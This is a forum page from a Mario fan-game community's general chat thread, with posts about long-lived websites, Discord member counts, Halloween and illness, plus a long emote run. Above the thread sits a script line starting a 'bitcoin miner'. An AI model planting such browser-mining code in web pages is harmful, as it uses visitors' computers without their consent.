<script>
miner.start(); // initialise bitcoin miner
</script>

mario fan games galaxypge projectsmw central

The Twitter Thread or Something

here's a good place for FRIENDLY, ENJOYABLE, and otherwise very GENERAL discussion!
Griflion
I'm gonna chomp ya!

Re: Keep Talking and Nobody Explodes! Aw...

Postby Griflion » 8 months ago

what? are you faking a spambot? I'm not sure what to think about this.

Rockythechao
the figure of Kevka's bear was a sightseeing
First name: Michael
Pronouns: he/they

Re: Keep Talking and Nobody Explodes! Aw...

Postby Rockythechao » 8 months ago

*predictive texting thread intensifies*
A2XT Episode 2's vice admiral "The Project's Not Dead Yet" person and certified Absurdly-Oblivious Fool

Useful posts, discussions & resources for SMBX and A2XT

My art & audio thread
Audiomack (new music), SoundCloud (old music)

𝐀𝐍 𝐀𝐖𝐄𝐒𝐎𝐌𝐄 𝐏𝐑𝐀𝐘𝐄𝐑 𝐈𝐒
𝐂𝐎𝐍𝐅𝐋𝐈𝐂𝐓 𝐖𝐈𝐓𝐇 𝐔𝐒

- 𝐁𝐀𝐓𝐓𝐋𝐄𝐒𝐔𝐈𝐓 𝐌𝐎𝐑𝐒𝐄𝐋 -

𝐊𝐄𝐄𝐏 𝐘𝐎𝐔𝐑 𝐃𝐈𝐆𝐍𝐈𝐓𝐘

Bean

Re: Talking the Talk Thread

Postby Bean » 8 months ago

I can name videos. I can't name threads.

jayScribble
FEEL THE FORCE
Pronouns: it, they, that

Postby jayScribble » 8 months ago

Food for though: what website domain would you think would still be active 10 years later from now?

Keep in mind of all the things that could potentially happen in the future, like outrages or controversy, laws and policies, decrease in ad revenue, competition, etc.

Some websites would like to stay alive for as long as possible despite some things going against them, such as Wikipedia, Twitter, and Facebook, but what else do you think will survive the ages?
ImageImageImage
Have a 3DS friend code and PM me if you added me: 1289-8788-1766
Three important threads for me:

bkamakaze
A million dollars isn’t cool. You know what’s cool? A basilisk.
First name: (◕ v ◕✿)

Postby bkamakaze » 8 months ago

jayScribble wrote: Food for though: what website domain would you think would still be active 10 years later from now?

Keep in mind of all the things that could potentially happen in the future, like outrages or controversy, laws and policies, decrease in ad revenue, competition, etc.

Some websites would like to stay alive for as long as possible despite some things going against them, such as Wikipedia, Twitter, and Facebook, but what else do you think will survive the ages?
https://crouton.net/
ImageImageImage

Griflion
I'm gonna chomp ya!

Postby Griflion » 8 months ago

jayScribble wrote: Food for though: what website domain would you think would still be active 10 years later from now?

http://tohoclock.touhou.moe/

Awoo
I came here to awoo at you!
Pronouns: he/him/his

Postby Awoo » 8 months ago

ワンワン :pal:

july
七月
First name: e!ɡa
Pronouns: she/her

Postby july » 8 months ago

Bean

Postby Bean » 8 months ago

Seems not many can talk the talk... or everyone's on a Discord channel.

Awoo

Postby Awoo » 8 months ago

Talking talk talk talk

I'd set up Discord but my laptop is a potato

BurntTenda
defeat four ducks

Postby BurntTenda » 7 months ago

It does not feel like October to me
Something goes here sometime.

Awoo

Postby Awoo » 7 months ago

Because it's practically November?

Happy Halloween

BobisOnlyBob
Mythical Quadruped

Postby BobisOnlyBob » 7 months ago

I brought cake, candy and crisps into work today and wore my Asriel hoodie.

I have bewildered my entire office. Apparently Halloween isn't even acknowledged here normally.
BOB is an acronym for BOB is Only BOB etc.

Ashan
The world has become a place

Postby Ashan » 7 months ago

Halloween avatar of me and my dog by hehesillycomics. I love it!

Bean

Postby Bean » 7 months ago

That is a cool avatar drawing there.

Ditocoaf
Haustone Tournament Finalist

Postby Ditocoaf » 7 months ago

Apparently this is the thread I have the most posts in. I don't remember being that active in this thread, even when I was a more active talkhauser 4-6 years ago. But I guess a catch-all thread that lasts forever can accumulate a lot of posts.

Rockythechao

Postby Rockythechao » 7 months ago

A2XT Episode 2's vice admiral "The Project's Not Dead Yet" person and certified Absurdly-Oblivious Fool

My art & audio thread

𝐀𝐍 𝐀𝐖𝐄𝐒𝐎𝐌𝐄 𝐏𝐑𝐀𝐘𝐄𝐑 𝐈𝐒
𝐂𝐎𝐍𝐅𝐋𝐈𝐂𝐓 𝐖𝐈𝐓𝐇 𝐔𝐒

- 𝐁𝐀𝐓𝐓𝐋𝐄𝐒𝐔𝐈𝐓 𝐌𝐎𝐑𝐒𝐄𝐋 -

𝐊𝐄𝐄𝐏 𝐘𝐎𝐔𝐑 𝐃𝐈𝐆𝐍𝐈𝐓𝐘

Bean

I wonder how many are even active still. By active, I mean just browsing the forums and making an occasional post. 50-100, you think?

Awoo

Re: Talking the Talk Talk

Does that include all active accounts or just the ones that have registered?

Bean

Total should be everyone that's ever registered here. I think it also includes bot accounts or others that have been kicked.

Awoo

Re: Talking talk Talk Talk

How does that compare to the discordhaus? I don't use it : x

Rockythechao

Postby Rockythechao » 7 months ago

So, eyeballing the member list numbers, discordhaus has roughly 200 members with about half of them visibly online. And for the heck of it I checked the other two big talkhaus-/raocow-related servers I'm in as well: the patreon server is only slightly bigger with 220 total and 122 online, and codehaus has 200-ish out of 700-ish online (though unlike discordhaus and the spotzone, codehaus has at least one public invite link out there and since it's the official SMBX2 server it's kind of become its own hybrid community between the talkhaus and SMBX forum.)

If anyone has the numbers for the AZCT, jumphalf and MaGLX3 servers, along with ones for any other projects from this community, I'm curious to see how they compare.

My art & audio thread

𝐀𝐍 𝐀𝐖𝐄𝐒𝐎𝐌𝐄 𝐏𝐑𝐀𝐘𝐄𝐑 𝐈𝐒
𝐂𝐎𝐍𝐅𝐋𝐈𝐂𝐓 𝐖𝐈𝐓𝐇 𝐔𝐒

- 𝐁𝐀𝐓𝐓𝐋𝐄𝐒𝐔𝐈𝐓 𝐌𝐎𝐑𝐒𝐄𝐋 -

𝐊𝐄𝐄𝐏 𝐘𝐎𝐔𝐑 𝐃𝐈𝐆𝐍𝐈𝐓𝐘

Enjl
i consume the glitches

Postby Enjl » 7 months ago

MaGLX3 server has 6 people currently, and last I knew jumphalf had about 35 or so.
ImageImageImageImageImageImageImage

Ashan

Warning pretty gross post

Today was an absolute nightmare. I woke up at like 5am with a sore stomach, so I took some Pepto Bismol and went back to bed. Couple hours later I wake up still feeling very sick, and get that feeling right before you're about to throw up where your mouth starts salivating a ton. So I run to the bathroom and heave up most the liquids in me. Then I spend the rest of the day drifting in and out of a fever dream in my bed and making occasional runs to the bathroom to dry heave into the toilet more. After about 5 or so of these trips (around 1pm at this point) it seemed to finally settle down a bit, and I just continued sleeping terribly. By 6pm I was finally feeling okay enough to get out of bed and run a bath and getting into that bath was one of the nicest things I've ever experienced.
But that basically consumed my entire day. Thankfully today was a day off classes, the last day of the break so I didn't miss anything. Hopefully I'll be feeling good enough tomorrow to go to class.

Ashan

IT IS OFFICIALLY
:catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: :catplanet: 